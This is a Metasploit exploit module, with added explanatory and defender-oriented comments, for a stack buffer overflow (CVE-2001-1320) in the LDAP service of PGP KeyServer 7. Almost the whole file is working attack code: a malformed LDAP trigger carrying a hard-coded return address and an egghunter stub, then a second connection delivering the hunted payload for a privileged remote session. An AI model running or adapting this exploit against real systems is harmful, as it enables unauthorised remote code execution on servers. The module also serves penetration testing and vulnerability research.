##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2001-1320: a stack buffer overflow in the
# LDAP service (PGPcertd.exe) shipped with Network Associates PGP KeyServer 7.
# The module sends two LDAP messages over two separate TCP connections (see
# #exploit): a malformed request that triggers the overflow and carries an
# egghunter stub, then a second request whose DN field carries the egg-tagged
# payload for the hunter to locate.
#
# Defender's view: the exposed component is the LDAP listener (default
# TCP/389). The trigger is a BER message that is not a normal LDAPMessage, so
# protocol-aware inspection or server-side parse failures on that port are the
# detection opportunity. The single hard-coded return address ties the module
# to one PGPcertd.exe build (see 'Targets').
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability ranking. The Description notes that the egghunter
  # may need WfsDelay adjusted, which is the main source of variability.
  Rank = GoodRanking

  # Raw TCP client (connect / sock / disconnect) and the egghunter generator
  # (generate_egghunter) used in #exploit.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Egghunter

  # Declares module metadata, payload constraints and the default option set.
  #
  # @param info [Hash] metadata merged by update_info (Metasploit convention)
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the LDAP service that is
        part of the NAI PGP Enterprise product suite. This module was tested
        against PGP KeyServer v7.0. Due to space restrictions, egghunter is
        used to find our payload - therefore you may wish to adjust WfsDelay.
      },
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2001-1320' ],
          [ 'OSVDB', '4742' ],
          [ 'BID', '3046' ],
          # PROTOS LDAPv3 test suite; the trigger bytes in #exploit are noted
          # as captured from it.
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
        ],
      # Metadata marks the resulting session as privileged.
      'Privileged' => true,
      'Payload' =>
        {
          # Space applies to the hunted payload sent in the second connection;
          # the trigger itself holds far less (see the comment in #exploit).
          'Space' => 450,
          # NUL, LF, CR and space must not appear in the encoded payload.
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # One fixed return address inside PGPcertd.exe (push esp; ret), so the
          # module depends on that binary being unchanged.
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
        ],
      'DisclosureDate' => '2001-07-16',
      'DefaultTarget' => 0))

    # Only the LDAP port is added beyond the Tcp mixin's own options.
    register_options(
      [
        Opt::RPORT(389)
      ])
  end

  # Runs the two-stage delivery: (1) the malformed trigger carrying the return
  # address and the egghunter stub, (2) on a fresh connection, a BindRequest
  # whose DN field carries the egg-tagged payload for the hunter to find.
  #
  # Relies on the Tcp mixin's connect / sock / disconnect and on the
  # framework-provided payload, payload_badchars and handler helpers, none of
  # which are defined in this file.
  def exploit
    connect

    # - Maximum payload space is 102 so we use EggHunter instead.
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

    # Per the Egghunter mixin: hunter[0] is the hunter stub (sent with the
    # trigger below) and hunter[1] is the egg, presumably the tag-prefixed
    # encoded payload (sent in the second message). The :checksum option is
    # passed through to the mixin — NOTE(review): assumed to make the hunter
    # validate the egg before jumping, confirm against the mixin.
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg = hunter[1]

    # BER-encoded LDAP BindRequest prefix captured from an ldapsearch client:
    # 0x30 SEQUENCE, messageID 1, 0x60 = BindRequest (APPLICATION 0),
    # version 3, then an OCTET STRING DN with long-form length 0x01c9. The egg
    # is placed in that DN field.
    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
    # Trailing [0] simple authentication with an empty password, closing the
    # BindRequest.
    eggend = "\x80\x00"

    print_status("Sending trigger and hunter first...")

    # Trigger bytes taken from a PROTOS LDAPv3 test case (see 'References'):
    # 0x30 SEQUENCE followed by a long-form length marker 0xfe (not a normal
    # short LDAPMessage), messageID 1, then a 0x63 SearchRequest prefix. The
    # overflow data is appended directly after this fixed prefix.
    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
    # Little-endian return address (push esp; ret) followed by the hunter stub.
    buf << [target['Ret']].pack('V') + hunter[0]
    # NUL terminator for the trigger.
    buf << "\x00"

    sock.put(buf)

    disconnect

    # Second connection: per the note above, the service rejects this request
    # but the bytes remain in memory for the hunter to locate.
    connect

    print_status("Sending hunted payload...")
    sock.put(eggstart+egg+eggend)

    # Hand off to the framework's session handler, then close the socket.
    handler
    disconnect
  end
end